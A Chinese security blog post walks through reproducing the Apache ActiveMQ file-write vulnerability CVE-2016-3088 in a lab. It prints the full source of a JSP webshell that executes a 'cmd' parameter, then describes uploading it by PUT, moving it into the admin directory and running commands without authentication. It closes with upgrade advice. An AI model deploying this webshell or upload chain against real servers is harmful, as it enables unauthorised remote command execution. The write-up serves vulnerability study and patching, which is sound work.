zoukankan      html  css  js  c++  java
  • Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

    Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

    一、漏洞描述

    该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。

    二、漏洞影响版本

    Apache ActiveMQ 5.0.0 - 5.13.2

    三、漏洞环境搭建

    1、官网下载apache-activemq-5.7.0-bin.tar 下载地址:http://activemq.apache.org/download-archives.html

    2、解压 

    3、启动,进入bin目录下,运行./activemq start

      

    4、浏览器访问http://192.168.10.149:8161/,如下图可以看到成功搭建环境

      

    四、漏洞复现

    1、PUT上传一个jsp的webshell到fileserver目录,下图可以看到成功上传jsp文件

    Jsp文件内容:

    <%@ page import="java.io.*"%>
    
    <%
    
     out.print("Hello</br>");
    
     String strcmd=request.getParameter("cmd");
    
     String line=null;
    
     Process p=Runtime.getRuntime().exec(strcmd);
    
     BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
    
     
    
     while((line=br.readLine())!=null){
    
      out.print(line+"</br>");
    
     }
    
    %>

      

    2、浏览器访问http://192.168.10.149:8161/fileserver/1.jsp,下图可以看到fileserver目录下的webshell没有被解析,说明fileserver目录没有执行权限

      

    3、利用该版本存在物理路径泄露漏洞,爆一下绝对路径

      

    4、利用Move方法将webshell移入admin目录下,如下图所示成功把文件移入到admin目录

      

    5、利用该版本存在的未授权访问漏洞,不用登录,访问http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下图可以看到成功执行命令

      

    五、漏洞防御

    1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

     ---------------------------------------------------------------------------------

    参考: https://www.secpulse.com/archives/60064.html

     

  • 相关阅读:
    [建树(非二叉树)] 1106. Lowest Price in Supply Chain (25)
    [建树(非二叉树)] 1090. Highest Price in Supply Chain (25)
    [并查集] 1118. Birds in Forest (25)
    [二叉树建树&完全二叉树判断] 1110. Complete Binary Tree (25)
    OAuth2 Backend Web Application 验证过程
    我如何介绍 Microservice
    .NET 的 Debug 和 Release build 对执行速度的影响
    ASP.NET MVC 从零开始
    ASP.NET MVC 从零开始
    Visualize The Workshop
  • 原文地址:https://www.cnblogs.com/yuzly/p/11278131.html
Copyright © 2011-2022 走看看